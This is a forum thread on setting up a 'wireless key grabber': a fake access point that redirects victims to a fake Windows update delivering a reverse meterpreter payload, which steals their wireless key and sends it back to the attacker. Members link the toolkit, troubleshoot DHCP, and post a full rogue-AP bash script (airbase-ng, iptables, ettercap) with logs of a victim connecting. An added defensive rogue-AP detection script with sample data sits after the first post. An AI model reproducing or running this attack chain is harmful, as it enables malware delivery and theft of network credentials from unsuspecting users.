Thread: Wireless key grabber - Backtrack 4

  1. #1
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    I have simplified my previous tutorial on grabbing wireless keys, specially set up for Backtrack 4.

    Here is the intro:

    This is a simplified tutorial for grabbing wireless keys from our victim, regardless of their wireless security. The theory is we create a fake access point, our victim connects, tries to surf the internet but gets redirected to our fake update page. The victim then downloads our “windows update”, which is a reverse meterpreter exe. Metasploit then runs its script, uploads wireless key viewer, executes it on the victim's computer, creates a randomly titled text file containing the PC's wireless key, and uploads it back to Backtrack.

    Crippled features:
    Reverse meterpreter port set to 5555; to be stealthy we should choose another port.
    Windows update html (index.html), a very simplified page; to be stealthy you need to redesign it.

    rar file here:
    http://www.megaupload.com/?d=C5LDSQEE

    readme at http://www.megaupload.com/?d=MM98S29W

    cr1spyj0nes --- is this what you needed?

    I'm sure we can automate the remainder.

    Edit: lots of views but no comments? Does it work?
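    A defender-side counterpart to the fake access point described in this post, added here as an example (it is not code from the thread or from the key grabber): a small rogue-AP check that a monitor-mode sensor could run over the beacons it observes. It flags a known ESSID advertised from an unauthorised BSSID, or advertised open when the real network is encrypted, which is the signature an airbase-ng clone of a protected network leaves on the air. The inventory, the BSSIDs and the beacon records are constructed sample data.

```python
# Added example: rogue / evil-twin AP check over beacon observations.
# Not part of the thread; the inventory and beacons below are constructed samples.
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

@dataclass(frozen=True)
class Beacon:
    bssid: str
    essid: str
    privacy: str  # "WPA2", "WPA", "WEP" or "OPN" (no encryption)

@dataclass(frozen=True)
class KnownNetwork:
    bssids: Set[str]   # authorised access points (lower-case MACs)
    privacy: str       # the security the real network is configured with

# Constructed inventory of the networks we are responsible for.
AUTHORISED: Dict[str, KnownNetwork] = {
    "test1234": KnownNetwork({"00:11:22:33:44:55"}, "WPA2"),
}

def find_rogue_aps(beacons: List[Beacon],
                   authorised: Dict[str, KnownNetwork]) -> List[Tuple[str, str, str]]:
    """Return (bssid, essid, reason) for every beacon that impersonates a known network."""
    alerts: List[Tuple[str, str, str]] = []
    for b in beacons:
        known = authorised.get(b.essid)
        if known is None:
            continue  # not one of ours; nothing to compare against
        if b.bssid.lower() not in known.bssids:
            alerts.append((b.bssid, b.essid, "known ESSID from unauthorised BSSID"))
        if b.privacy != known.privacy:
            # An open clone of an encrypted network is the classic evil-twin signature.
            alerts.append((b.bssid, b.essid,
                           f"security mismatch: expected {known.privacy}, beacon advertises {b.privacy}"))
    return alerts

# Constructed observations: the real AP, an open clone of it, and an unrelated hotspot.
SAMPLE_BEACONS = [
    Beacon("00:11:22:33:44:55", "test1234", "WPA2"),
    Beacon("00:C0:CA:19:A0:8C", "test1234", "OPN"),
    Beacon("AA:BB:CC:DD:EE:FF", "CoffeeShop", "OPN"),
]

if __name__ == "__main__":
    for bssid, essid, reason in find_rogue_aps(SAMPLE_BEACONS, AUTHORISED):
        print(f"ALERT {bssid} '{essid}': {reason}")
```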

  2. #2
    Junior Member
    Join Date
    Oct 2008
    Posts
    82

    Default

    I will try it out, but before that I also need to get your Fake AP project running.

    Then I will understand this much more easily!

    By the way, have a look at my thread http://forums.remote-exploit.org/showthread.php?t=21134 ; I need some help getting it to work.

    Do I have to disable the DHCP service on my router? This might be one of the reasons why it didn't work.

    Check it and let me know!

    Thank you!

  3. #3
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    12

    Default Wireless key grabber - Backtrack 4

    @hm2075
    Thanks a lot for all your tutorials so far.

    I tried your method in BT4 with partial success. The first issue I had was with the DHCP server. The client was connected but unable to obtain a valid IP. After some investigation it appeared to be an issue with the user groups of the dhcpd.

    When I issued this command:
    Code:
    # dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0
    It returned an error: Cannot create an entry /var/run/dhcpd.pid -- Permission denied.

    To mitigate this I followed:
    Code:
    #vim /var/run/dhcpd.pid
    #chgrp dhcpd /var/run/dhcpd.pid
    #chown dhcpd /var/run/dhcpd.pid
    Then I restarted the DHCP server and connected clients were able to get valid IPs.

    The next issue I had was obtaining the key.
    Once I was connected to the fake AP, I downloaded and installed the file; however I was not able to receive the txt file with the WPA key. On the metasploit terminal it was stuck for ages on: Uploading key.... (or something like that)

    Any suggestions?

    Regards

    ZŁY$

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Are you sure you are using my wireless key grabber for Backtrack 4 and not Backtrack 3?

    I see you have issued

    dhcpd3 -cf /etc/dhcpd3/dhcpd.conf at0

    whereas you should have issued

    /etc/init.d/dhcp3-server restart

    If you are following the old tutorial then it may not work; follow this one and it should be fine:
    http://forums.remote-exploit.org/showthread.php?t=21144

    Can a mod merge this with this thread please?

    http://forums.remote-exploit.org/showthread.php?t=21144

  5. #5
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    12

    Default

    I definitely used the correct grabber.

    As I explained, I had an issue with the DHCP not issuing IPs once connected. By trying to restart the DHCP server with this command "/etc/init.d/dhcp3-server restart" it was displaying a "fail" error message. Hence my workaround to bypass this issue, which worked a treat.

    However my issue was with the keygrabber not uploading back the key.
    From the connected client I telnet back to my BT4 on port 5555 to see if a connection is established. As soon as I connected to the port I could see all the registry values being transferred, and on the metasploit terminal a message appeared as "upload success"; however no txt file was present on the BT4.

    Hmmm, I'm a bit puzzled... I'll give it another go with a different laptop.
    (Please note that the laptop I tried it on had limited privileges, so I don't know if this poses any limitations...)

    I cannot post yet in the wireless section, thus my new thread in this section...

  6. #6
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Ah, I see; I didn't realise that you couldn't post in the wireless section.

    Looks like you almost got it to work: wkv uploaded and executed on the victim's computer, just the key text file not downloaded.

    Open up the harvester.rb file and look at the coding in there; maybe you just need to amend the destination of the text file.

    I can explain each line to you if you get stuck.

  7. #7
    Junior Member
    Join Date
    Apr 2008
    Posts
    36

    Default

    hm2075, please can you upload the rar file and readme file somewhere else rather than Megaupload?

  8. #8
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    Any suggestions?

  9. #9
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Threads merged
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  10. #10
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    I'm trying to work through your tutorial. I'm running Backtrack 3, so I know some of the prerequisites will install and behave differently. With that said, can you perhaps help me troubleshoot my configuration?
    Attack PC:
    RTL8187L USB adapter

    Victim:
    MS Vista
    Intel 4965AGN

    Things work up to the victim receiving an IP. What I can't seem to figure out is why traffic is not forwarding through the attacker's eth0. Once that is addressed, I can move on to getting lighttpd working on BT3.

    Code:
    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet, for example eth0: "
    read -e IFACE
    echo -n "Enter your wireless interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
    read -e ESSID
    kill `cat /var/run/dhcpd.pid`
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop $WIFACE
    ifconfig $WIFACE down
    airmon-ng start $WIFACE
    modprobe tun
    konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
    sleep 10
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j MASQUERADE
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j MASQUERADE
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/state/dhcp/dhcpd.leases'
    konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward
    airbase-ng
    Code:
    3:41:24  Got broadcast probe request from 00:18:DE:3C:FB:BF
    13:41:24  Got broadcast probe request from 00:1D:E0:4F:B0:07
    13:41:25  Got directed probe request from 00:1F:3B:00:F2:51 - "test1234"
    13:41:25  Got an auth request from 00:1F:3B:00:F2:51 (open system)
    13:41:25  Client 00:1F:3B:00:F2:51 associated (unencrypted) to ESSID: "test1234"
    13:41:25  Got broadcast probe request from 00:18:DE:69:47:CD
    Ettercap
    Code:
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Listening on at0... (Ethernet)
    
       at0 ->       00:C0:CA:19:A0:8C          10.0.0.1     255.255.255.0
    
    SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
    Privileges dropped to UID 65534 GID 65534...
    
    <truncated>
    
    DHCP: [00:1F:3B:00:F2:51] DISCOVER
    DHCP: [10.0.0.1] OFFER : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222
    DHCP: [00:1F:3B:00:F2:51] REQUEST 10.0.0.254
    DHCP: [10.0.0.1] ACK : 10.0.0.254 255.255.255.0 GW 10.0.0.1 DNS 208.67.222.222

    DHCPD
    Code:
    Listening on LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
    Sending on   LPF/at0/00:c0:ca:19:a0:8c/10.0.0/24
    Sending on   Socket/fallback/fallback-net
    DHCPDISCOVER from 00:1f:3b:00:f2:51 via at0
    DHCPOFFER on 10.0.0.254 to 00:1f:3b:00:f2:51 (victim) via at0
    DHCPREQUEST for 10.0.0.254 (10.0.0.1) from 00:1f:3b:00:f2:51 (victim) via at0
    DHCPACK on 10.0.0.254 to 00:1f:3b:00:f2:51 (victim) via at0
    DHCPINFORM from 10.0.0.254 via at0
